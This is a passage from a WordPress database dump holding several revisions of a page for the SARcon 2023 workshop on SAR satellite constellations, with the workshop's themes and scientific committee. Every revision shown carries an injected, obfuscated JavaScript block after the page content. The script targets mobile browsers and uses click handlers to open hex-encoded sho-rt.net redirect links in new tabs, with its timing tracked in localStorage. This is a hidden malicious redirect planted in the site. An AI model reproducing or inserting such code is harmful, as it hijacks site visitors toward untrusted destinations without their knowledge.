68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 17:18:46','2022-10-13 17:18:46','',2736,'https://gsw2023.com/?p=2757',0,'revision','',0),
(2758,1,'2022-10-13 17:24:08','2022-10-13 17:24:08','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" image_paddings=\"20px 0px 0px 0px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"47\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 17:24:08','2022-10-13 17:24:08','',2736,'https://gsw2023.com/?p=2758',0,'revision','',0),
(2759,1,'2022-10-13 18:04:18','2022-10-13 18:04:18','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" image_paddings=\"20px 0px 0px 0px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"47\"][/vc_column][/vc_row][vc_row bg_type=\"image\" bg_override=\"full\"][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 